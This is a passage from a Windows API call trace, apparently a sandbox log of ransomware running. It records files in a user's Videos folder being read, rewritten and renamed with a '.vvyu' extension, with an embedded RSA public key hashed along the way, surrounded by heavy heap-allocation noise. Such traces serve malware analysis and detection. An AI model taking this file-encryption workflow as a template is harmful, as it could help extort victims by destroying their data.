lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36c8 [0202.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3728 [0202.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0202.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0202.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0202.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3740 [0202.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36e0 [0202.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36b0 [0202.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0202.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0202.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0202.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0202.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0202.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1c78 | out: hHeap=0x620000) returned 1 [0202.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.742] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x1ad9, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x1ad9, lpOverlapped=0x0) returned 1 [0202.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.742] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x1ade, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.742] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.744] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.745] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.745] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.745] CloseHandle (hObject=0x510) returned 1 [0202.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0202.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.747] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\1l1mBiXT EDK.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\1l1mbixt edk.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\1l1mBiXT EDK.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\1l1mbixt edk.mkv.vvyu")) returned 1 [0202.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.748] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0202.751] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef2d43c0, ftCreationTime.dwHighDateTime=0x1d89e6b, ftLastAccessTime.dwLowDateTime=0x6a7c5150, ftLastAccessTime.dwHighDateTime=0x1d8a011, ftLastWriteTime.dwLowDateTime=0x6a7c5150, ftLastWriteTime.dwHighDateTime=0x1d8a011, nFileSizeHigh=0x0, nFileSizeLow=0x6082, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Iwi4py9F_tBuUPcDK.flv", cAlternateFileName="IWI4PY~1.FLV")) returned 1 [0202.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0202.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.751] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\Iwi4py9F_tBuUPcDK.flv") returned=".flv" [0202.751] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\Iwi4py9F_tBuUPcDK.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\iwi4py9f_tbuupcdk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.752] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=24706) returned 1 [0202.752] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.755] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x605c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.755] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.757] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.757] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x6082, lpOverlapped=0x0) returned 1 [0202.758] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.758] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.758] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.758] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.759] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.759] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.759] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.759] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.759] GetLastError () returned 0x0 [0202.759] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.759] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.760] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.760] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.760] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6080) returned 0x2ea99b0 [0202.760] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1c78 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1cc0 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0202.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0202.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.762] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0202.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36e0 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea36c8 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0202.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0202.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.765] GetCurrentThreadId () returned 0x66c [0202.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea95e8 [0202.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.766] GetCurrentThreadId () returned 0x66c [0202.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: 